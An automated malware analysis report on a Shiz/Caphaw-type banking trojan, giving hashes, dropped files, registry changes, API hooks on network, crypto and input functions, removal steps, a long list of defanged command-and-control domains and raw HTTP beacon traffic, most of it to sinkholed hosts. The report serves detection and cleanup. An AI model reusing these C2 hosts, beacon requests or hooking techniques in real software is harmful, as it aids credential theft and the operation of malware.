HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Kazy.71723 (B) (Emsisoft), Gen:Variant.Kazy.71723 (AdAware), Backdoor.Win32.Shiz.FD, Shiz.YR, GenericInjector.YR, BackdoorCaphaw_QKKBAL.YR (Lavasoft MAS)Behaviour: Trojan, Backdoor
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 6d98ba6fe2c86b6e1e9092e7125f8b21
SHA1: d1adbe8019eefc298aaf44deee20d77abcaa6e94
SHA256: 2e850d8a37d6b0791c19f622dcbcc1267790999d2667340dd294d96114277e66
SSDeep: 3072:n/w6gCmvZZ1g9nTR61F/tNnr4U7BRScmJ8Re1YBRyD 4KABiQ3AwZI9tBkPL/Z27:/wVhk8cgSVLaGD8bQNZqU/Zq7Pmyjrx
Size: 260096 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Oracle Corporation
Created at: 1991-10-09 12:49:33
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
%original file name%.exe:224
The Trojan injects its code into the following process(es):
Explorer.EXE:532
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process %original file name%.exe:224 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\AppPatch\dbvpfca.exe (1801 bytes)
%System%\config\software (3115 bytes)
%System%\config\SOFTWARE.LOG (5787 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\1.tmp (0 bytes)
Registry activity
The process %original file name%.exe:224 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6B 3C E2 9F C1 9D 84 72 05 C9 1C D9 FD 54 D6 D7"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\esent.dll"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%WinDir%\apppatch\dbvpfca.exe_, \??\%WinDir%\apppatch\dbvpfca.exe"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
"EventMessageFile" = "%System%\esent.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"a8a67a25" = "pEìX£bÀ¸¬qÄHF‡KöFûe#µ¡X$YÉòd¼Œ¤Kô1,Å $ë›ÛÌ«â€Â¹l}Ë {Å“zΙC%é[qñl4ì;û´[Ã’#»Û:ÑU„„Ãâ€ÂÂÂÂ\±ª²DÆ’uœ¡Ü¼);¼\Æ’tµ2â€ÂÂkDùâ€ÂÂaâ€ÂÂ*›cü$}Sô|ë$¤ô{¬q³#sÃ…Ã¥\yuJÛËu©|ù¢rKã!$’‹‹b±ÃÄ£ã“ÉUcdÃÂÂÄZ¡r»ôâ€ÂÂ)Û©Š]“QlYÛl]$$D´ƒÌ£Q$aŒ‚*™ü›ÙóÃÂÂÃÂÂ=éÃâ€ÂÑщ¬q9|áÃÂÂù’‘ÃÂÂéšÄR"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\6d98ba6fe2c86b6e1e9092e7125f8b21\DEBUG]
"Trace Level" = ""
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\ESENT\Process\6d98ba6fe2c86b6e1e9092e7125f8b21\DEBUG]
"Trace Level"
Dropped PE files
| MD5 | File path |
|---|---|
| 6ac0f73e546e374dd98b682c4a62f1d8 | c:\WINDOWS\AppPatch\dbvpfca.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
The Trojan installs the following user-mode hooks in CRYPT32.dll:
CertVerifyCertificateChainPolicy
The Trojan installs the following user-mode hooks in WININET.dll:
HttpSendRequestExA
HttpSendRequestW
InternetReadFileExA
InternetWriteFileExA
InternetQueryDataAvailable
HttpSendRequestExW
InternetReadFile
HttpSendRequestA
InternetCloseHandle
The Trojan installs the following user-mode hooks in USER32.dll:
GetWindowTextA
GetClipboardData
SendInput
GetMessageA
GetMessageW
TranslateMessage
The Trojan installs the following user-mode hooks in ADVAPI32.dll:
CryptEncrypt
The Trojan installs the following user-mode hooks in WS2_32.dll:
WSASend
recv
gethostbyname
WSARecv
send
The Trojan installs the following user-mode hooks in kernel32.dll:
CreateFileW
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:224
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%WinDir%\AppPatch\dbvpfca.exe (1801 bytes)
%System%\config\software (3115 bytes)
%System%\config\SOFTWARE.LOG (5787 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: Fallaciously
Product Name: Cunctatury
Product Version: 9.2.9.8
Legal Copyright: overwisdom
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 0.3.8.6
File Description: anoscope
Comments:
Language: English (United States)
Company Name: FallaciouslyProduct Name: CunctaturyProduct Version: 9.2.9.8Legal Copyright: overwisdomLegal Trademarks: Original Filename: Internal Name: File Version: 0.3.8.6File Description: anoscopeComments: Language: English (United States)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .YolX | 4096 | 28591 | 1536 | 0 | 53e979547d8c2ea86560ac45de08ae25 |
| .text | 32768 | 17811 | 17920 | 4.63219 | 426f185540c0be2b362fec1782d1ea88 |
| .UrnGiP | 53248 | 1070 | 1536 | 0 | 53e979547d8c2ea86560ac45de08ae25 |
| .awBQJUL | 57344 | 1695 | 2048 | 0 | c99a74c555371a433d121f551d6c6398 |
| .slUCrgA | 61440 | 2023 | 2048 | 0 | c99a74c555371a433d121f551d6c6398 |
| .data | 65536 | 63123 | 7168 | 4.94757 | fcb579f5a65b5002e2052ddbe1f1c56a |
| .GdUqi | 131072 | 2188 | 2560 | 3.74983 | 8d3efb48aaa62cbbd679fa6b4b3746be |
| .rdata | 135168 | 212713 | 212992 | 5.54081 | 1498d94f261537a406a4eef10c2a9790 |
| .fvTRZ | 348160 | 790 | 1024 | 0 | 0f343b0931126a20f133d67c2b018a3b |
| .mHTN | 352256 | 396 | 512 | 0 | bf619eac0cdf3f68d496ea9344137e8b |
| .rsrc | 356352 | 5072 | 5120 | 3.04187 | 6ad2c3a4b1fa49bb9cc2a8424a19eb3f |
| .GjQNcMz | 364544 | 266 | 512 | 0 | bf619eac0cdf3f68d496ea9344137e8b |
| .ZJhdvo | 368640 | 1232 | 1536 | 0 | 53e979547d8c2ea86560ac45de08ae25 |
| .sIVhg | 372736 | 2338 | 2560 | 0 | a371492f16c0940507435909603efe88 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 19
8a80e8fa15f54c0fa85b436d56431235
316299bf645744831eb69661f3a57861
3d9a7ba5d58084d0fd5db81622c98bea
2eda59d1cc49f8dbb617d7cfd2d39b89
b0563744611e7d55d9daadb867ac29bb
b498304896c472275eee4b586f8595d9
b03f50d97d53bede6f66f427899146df
31014e92b44e0eab99ae9716d9d38ca3
90b8b52f7079d5ef7ef88221d90083f8
735b633f9192a4139e25195b6da0a8d1
207f4d312efdb632514a88d49824b4df
43730bb278148f0afc8d9de06779a657
b0c1d60c52ffb5cd4584edf1996391fc
1a3c39d66b1036741d5d45867c227bd7
4e190b719f39287a132049c3fee72edd
263fa8e5672d010da6845ee117992b00
1cdde3d887b4bf0e15f67127a467a4fb
d2b4344f82091dbc8145e26618d9115d
04f85fb2bfca983ca449c81a4b1eebe1
Network Activity
URLs
| URL | IP |
|---|---|
| hxxp://keraborigin.eu/login.php | 95.211.174.92 |
| hxxp://kemocujufys.eu/login.php | 23.253.126.58 |
| hxxp://digivehusyd.eu/login.php | 69.195.129.70 |
| hxxp://xuxusujenes.eu/login.php | 208.100.26.234 |
| hxxp://qekenilacap.eu/login.php | |
| hxxp://lysovidacyx.eu/login.php | 23.253.126.58 |
| hxxp://tufecagemyl.eu/login.php | 23.253.126.58 |
| hxxp://norumikemem.eu/login.php | 23.253.126.58 |
| hxxp://lykemujebeq.eu/login.php | 23.253.126.58 |
| hxxp://foxivusozuc.eu/login.php | 23.253.126.58 |
| hxxp://vocakemenir.eu/login.php | 23.253.126.58 |
| hxxp://ryqecolijet.eu/login.php | 23.253.126.58 |
| hxxp://xuqohyxeqak.eu/login.php | 23.253.126.58 |
| hxxp://kefuwidijyp.eu/login.php | 23.253.126.58 |
| hxxp://puvybivihox.eu/login.php | 23.253.126.58 |
| hxxp://jeluganusog.eu/login.php | 23.253.126.58 |
| hxxp://nopegymozow.eu/login.php | 23.253.126.58 |
| hxxp://nozulufynax.eu/login.php | 23.253.126.58 |
| hxxp://cihunemyror.eu/login.php | 23.253.126.58 |
| hxxp://vofozymufok.eu/login.php | 23.253.126.58 |
| hxxp://ryleryqacic.eu/login.php | 23.253.126.58 |
| hxxp://lyvejujolec.eu/login.php | 23.253.126.58 |
| hxxp://rynazuqihoj.eu/login.php | 23.253.126.58 |
| hxxp://xugiqonenuz.eu/login.php | 69.195.129.70 |
| hxxp://pupujeguper.eu/login.php | 23.253.126.58 |
| hxxp://fodakyhijyv.eu/login.php | 23.253.126.58 |
| hxxp://ciliqikytec.eu/login.php | 23.253.126.58 |
| hxxp://kevedorozup.eu/login.php | 23.253.126.58 |
| hxxp://dimutobihom.eu/login.php | 23.253.126.58 |
| hxxp://mamixikusah.eu/login.php | 23.253.126.58 |
| hxxp://jewuqyjywyv.eu/login.php | 23.253.126.58 |
| hxxp://qekikyvutic.eu/login.php | 23.253.126.58 |
| hxxp://tucyguqaciq.eu/login.php | 23.253.126.58 |
| hxxp://jefapexytar.eu/login.php | 23.253.126.58 |
| hxxp://qeqinuqypoq.eu/login.php | 23.253.126.58 |
| hxxp://puregivytoh.eu/login.php | 23.253.126.58 |
| hxxp://galokusemus.eu/login.php | 23.253.126.58 |
| hxxp://gadufiwabim.eu/login.php | 23.253.126.58 |
| hxxp://qetuluvolos.eu/login.php | 23.253.126.58 |
| hxxp://ganycyhywek.eu/login.php | 23.253.126.58 |
| hxxp://qebahilojam.eu/login.php | 23.253.126.58 |
| hxxp://ryhuzilywax.eu/login.php | 23.253.126.58 |
| hxxp://fokyxazolar.eu/login.php | 23.253.126.58 |
| hxxp://qexofyqihid.eu/login.php | 23.253.126.58 |
| hxxp://lyruxyxaxaw.eu/login.php | 23.253.126.58 |
| hxxp://xukovoruput.eu/login.php | 23.253.126.58 |
| hxxp://nojejecebuw.eu/login.php | 23.253.126.58 |
| hxxp://marytymenok.eu/login.php | 23.253.126.58 |
| hxxp://gatedyhavyd.eu/login.php | 23.253.126.58 |
| xuqufyduras.eu | 23.253.126.58 |
| www.bing.com | 204.79.197.200 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gatedyhavyd.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:49 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: pupujeguper.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:26 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: nozulufynax.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:45 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: galokusemus.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:50 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: marytymenok.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:48 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: jefapexytar.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:50 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: xuxusujenes.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx/1.4.6 (Ubuntu)
Date: Sun, 04 Sep 2016 05:39:05 GMT
Content-Type: text/html
Content-Length: 579
Connection: keep-alive
<html>..<head><title>404 Not Found</title></head>..<body bgcolor="white">..<center><h1>404 Not Found</h1></center>..<hr><center>nginx/1.4.6 (Ubuntu)</center>..</body>..</html>..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->......
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: xuxusujenes.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx/1.4.6 (Ubuntu)
Date: Sun, 04 Sep 2016 05:39:05 GMT
Content-Type: text/html
Content-Length: 579
Connection: keep-alive
<html>..<head><title>404 Not Found</title></head>..<body bgcolor="white">..<center><h1>404 Not Found</h1></center>..<hr><center>nginx/1.4.6 (Ubuntu)</center>..</body>..</html>..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..HTTP/1.1 404 Not Found..Server: nginx/1.4.6 (Ubuntu)..Date: Sun, 04 Sep 2016 05:39:05 GMT..Content-Type: text/html..Content-Length: 579..Connection: keep-alive..<html>..<head><title>404 Not Found</title></head>..<body bgcolor="white">..<center><h1>404 Not Found</h1></center>..<hr><center>nginx/1.4.6 (Ubuntu)</center>..</body>..</html>..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and
<<< skipped >>>
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ganycyhywek.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:14 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qexofyqihid.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:18 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: cihunemyror.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:49 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: dimutobihom.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:53 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gatedyhavyd.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:48 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lyvejujolec.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:13 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: puregivytoh.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:54 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: kevedorozup.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:15 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: marytymenok.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:49 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: nopegymozow.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:48 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: xukovoruput.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:16 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ryhuzilywax.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:33 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: norumikemem.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:23 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lyruxyxaxaw.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:56 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: fodakyhijyv.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:49 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: kevedorozup.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:14 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vocakemenir.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:37 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: rynazuqihoj.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:49 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ryleryqacic.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:17 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ciliqikytec.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:50 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: tucyguqaciq.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:50 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
